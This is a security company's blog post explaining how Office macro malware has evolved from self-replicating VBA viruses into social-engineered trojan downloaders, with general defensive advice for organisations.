The evolution of macro malware

Those who pay attention to such things will know that macro malware, a staple of the late 90s and early 2000s, has made a major comeback over the past few years. Why and how are criminals using this tactic to compromise end-users?

A macro is fundamentally nothing more than a way of automating mundane or repetitive tasks. Using a macro language, users can create simple programs that group several distinct actions into a single command that executes them in sequence.

Back in the day, numerous viruses were written in Visual Basic for Applications (VBA), a macro language for Microsoft Office. Macro viruses like Nuclear and Melissa were designed to replicate across all compatible documents, editing data, deleting files and generally being a nuisance. At the time, merely opening a compromised file would trigger the macro and spread the infection, which meant that such viruses were relatively easy to ‘catch’.

Silobreaker’s Time Series tool showing recent malware associated with Microsoft Office.

Microsoft eventually took action by disabling macros from running automatically when they released Office 2007. Since then, macro viruses have more or less died out… until relatively recently.

Over the last two years we’ve witnessed a resurgence in this method of compromise, as malware authors realise that the most economical way of penetrating an organisation is via the average user. But the new versions of this malware don’t tend to operate in the same way as their predecessors, and while less complex, they are far more dangerous. Today’s macro viruses are trojan downloaders, simple scripts that use a machine’s internet connection to download a malicious payload from a site specified by the malware’s author. BlackEnergy, Locky and Dridex have all used this method of infection, to name but a few.

Of course, there are still a few hurdles for malware authors to overcome.

First off, macros are still disabled by default, which means that users have to open a malicious file and enable macros for the downloader to do its work. This is where social engineering comes into play.

An example of what a malicious document encouraging you to enable macros might look like.

Have you recently received an unreadable but important looking document telling you to enable macros? It’s almost certainly malicious. Fake invoices, CVs and purchase orders are routinely sent to companies all over the world, many of them containing a downloader for the ransomware du jour, or if you’re really unlucky, something far worse.

The second problem is that there usually needs to be a functioning internet connection for the payload to be downloaded. The odds are good that this will happen eventually, but what if it doesn’t? What if a firewall blocks the incoming download? It turns out that it’s perfectly possible to embed a payload into the malicious document itself, and use a macro to execute it, rather than having to download it at all.

Crunchcode is a commercial VBA obfuscator.

You may wonder where antivirus comes into play in all this. Well, reports on the preponderance of polymorphic malware already suggest that signature-based detection is well past its prime. Authors of macro malware usually take care to obfuscate their code, whether by adding redundant operations that confuse antivirus programs, or making the macro’s code essentially unreadable without the proper key.

The best defences, as always, are common sense and preparedness; don’t open attachments that look suspicious or come from people you don’t know. Update your browser and operating system. Keep abreast of new macro malware campaigns and alert your employees when a new outbreak occurs, so they think twice before clicking.

The Silobreaker Team

This website uses cookies.
See our privacy policy at